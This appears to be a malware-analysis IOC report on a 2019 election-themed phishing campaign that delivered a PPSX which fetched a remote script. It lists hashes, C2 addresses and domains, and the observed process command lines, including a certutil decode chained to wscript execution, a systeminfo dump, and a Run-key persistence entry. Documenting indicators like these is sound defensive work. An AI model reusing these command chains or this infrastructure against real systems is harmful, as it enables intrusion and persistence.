#xml_wsh_280319

1. #IOC #OptiData #VR #APT #XML_RELS #WSH #EXE_Less #Recon
2.  
3. https://pastebin.com/kiSbFi36
4.  
5. attack_vector
6. --------------
7. email attach .ZIP > .PPSX > XML_RELS > GET > WSH > %temp%\tmp4E07.tmp > %userprofile%\NTUSR.DAT
8.  
9. email_headers
10. --------------
11. Received: from o1.31pqt.s2shared.stmpendgrid.net ([167.89.100.227])
12. Received: by filter0029p3iad2.sendgrid.net
13. Received: from OTQ2MjY1Mw (host-94-103-82-136.hosted-by-vdsina.ru [94.103.82.136]) by ismtpd0007p1lon1.sendgrid.net
14. Date: Thu, 28 Mar 2019 12:46:31 +0000 (UTC)
15. From: socis@socis.kiev.ua
16. To: user00@victim01
17. Subject: ПРЕС-РЕЛІЗ ЗА РЕЗУЛЬТАТАМИ СОЦІОЛОГІЧНОГО ДОСЛІДЖЕННЯ «ПРЕЗИДЕНТСЬКІ ВИБОРИ 2019-БЕРЕЗЕНЬ»
18.  
19. files
20. --------------
21. SHA-256 30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72
22. File name Prezent_UA_2k_berezen_PRESS.ppsx [Microsoft PowerPoint 2007+]
23. File size 391.03 KB (400418 bytes)
24.  
25. SHA-256 360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f
26. File name wj5yuxmp.hmf [XML document, ASCII text, with very long lines, with CRLF]
27. File size 272.7 KB (279242 bytes)
28.  
29. SHA-256 09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b
30. File name tmp4E07.tmp [ASCII text, with very long lines, with no line terminators]
31. File size 270.93 KB (277430 bytes)
32.  
33. SHA-256 85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3
34. File name NTUSR.DAT [ASCII text, with very long lines, with no line terminators]
35. File size 203.19 KB (208070 bytes)
36.  
37. activity
38. **************
39.  
40. PL_SCR = C2 = 185.176.43.94
41.  
42. netwrk
43. --------------
44. 185.176.43.94 socis.cf GET /wj5yuxmp.hmf HTTP/1.1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;)
45. 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
46. 185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
47. 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
48. 185.176.43.94 tk99.gq POST / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
49. 185.176.43.94 tk99.gq GET / HTTP/1.1 Mozilla/5.0 (Windows NT 6.1; WOW64)
50.  
51. comp
52. --------------
53. POWERPNT.EXE 2844 TCP localhost 49232 185.176.43.94 80 ESTABLISHED
54. wscript.exe 1104 TCP localhost 49224 185.176.43.94 80 ESTABLISHED
55.  
56. proc
57. --------------
58. C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE /s C:\Users\operator\Desktop\Prezent_UA_2k_berezen_PRESS.ppsx
59.  
60. C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
61. C:\Windows\system32\cmd.exe /c certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT && timeout 10 && wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
62.  
63. C:\Windows\system32\certutil -decode C:\tmp\tmp4E07.tmp C:\tmp\NTUSR.DAT
64. C:\Windows\system32\timeout 10
65.  
66. C:\Windows\system32\wscript.exe //B //E:vbs C:\tmp\NTUSR.DAT
67. C:\Windows\System32\wscript.exe" //B //E:vbs "C:\Users\operator\NTUSR.DAT
68. C:\Windows\System32\cmd.exe" /c mode con cp select=65001 | systeminfo > C:\tmp\radB50A0.tmp
69. C:\Windows\system32\mode.com con cp select=65001
70. C:\Windows\system32\systeminfo.exe
71.  
72. persist
73. --------------
74. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 29.03.2019 12:23
75. (Default) c:\users\operator\ntusr.dat 29.03.2019 12:23
76. wscript.exe //B //E:vbs "C:\Users\operator\NTUSR.DAT"
77.  
78. drop
79. --------------
80. %temp%\tmp4E07.tmp
81. %userprofile%\NTUSR.DAT
82.  
83. # # #
84. https://www.virustotal.com/gui/file/30f568a18bb7f3ce2419cb3f7b4b8f7619072b211b24a9c462a6c312707d0a72/details
85. https://www.virustotal.com/gui/file/360c967784e869cc5851b66b873f78341fbfee5fc8da367e58ba85882639c91f/details
86. https://www.virustotal.com/gui/file/09c4c4df7657c89ae55529c916b19d6acdbb7ccc2112df03f99eb09e66d3ee5b/details
87. https://www.virustotal.com/gui/file/85b8d699f0bc521a11a5e58e81cc6a39937adc341073177added1547ba39e0d3/details
88. https://urlscan.io/result/83a3366e-12ee-4a6c-a326-a8eb19bc77c7
89.  
90. VR